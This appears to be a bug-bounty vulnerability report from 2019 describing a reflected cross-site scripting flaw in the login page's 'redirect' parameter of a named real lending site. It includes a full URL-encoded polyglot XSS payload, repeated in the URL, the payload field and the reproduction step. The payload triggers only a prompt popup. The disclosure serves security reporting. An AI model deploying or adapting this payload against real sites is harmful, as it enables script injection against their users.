Vulnerability Name : Cross Site Scripting \u002D (on mobile opt entering page)\u000D\u000A\u000D\u000AVulnerable URL : https://kissht.com/login?redirect\u003D%22%2f%3ejaVasCript%3a%2f%2a\u002D%2f%2a%60%2f%2a%5c%60%2f%2a%27%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f\u002D\u002D!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e\u000D\u000A\u000D\u000AVulnerable Parameter : redirect\u000D\u000A\u000D\u000AVulnerable Payload : %22%2f%3ejaVasCript%3a%2f%2a\u002D%2f%2a%60%2f%2a%5c%60%2f%2a\u0027%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f\u002D\u002D!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e\u000D\u000A\u000D\u000AHow to reproduce this issue:\u000D\u000A\u000D\u000A1. Visit the url it will give an XSS popup.\u000D\u000A\u000D\u000Ahttps://kissht.com/login?redirect\u003D%22%2f%3ejaVasCript%3a%2f%2a\u002D%2f%2a%60%2f%2a%5c%60%2f%2a%27%2f%2a%22%2f%2a%2a%2f(%2f%2a%20%2a%2foNcliCk%3dprompt()%20)%2f%2f%0D%0A%0d%0a%2f%2f%3c%2fstYle%2f%3c%2ftitLe%2f%3c%2fteXtarEa%2f%3c%2fscRipt%2f\u002D\u002D!%3e%5cx3csVg%2f%3csVg%2foNloAd%3dprompt(123)%2f%2f%3e%5cx3e\u000D\u000A\u000D\u000A\u000D\u000APOC :\u000D\u000A\u000D\u000AScreenshort can be found in the attachment.
Screenshots
Comments (0)
To comment, please sign in.
Event ID: 946
Total Points = 10
Issues Reported: 4
Browser Version: 60.0
Operating System Linux
Added On
May 16, 2019, 2:54 a.m.
Bug Type
Security
Submitted
Independently
OS Version:
Unknown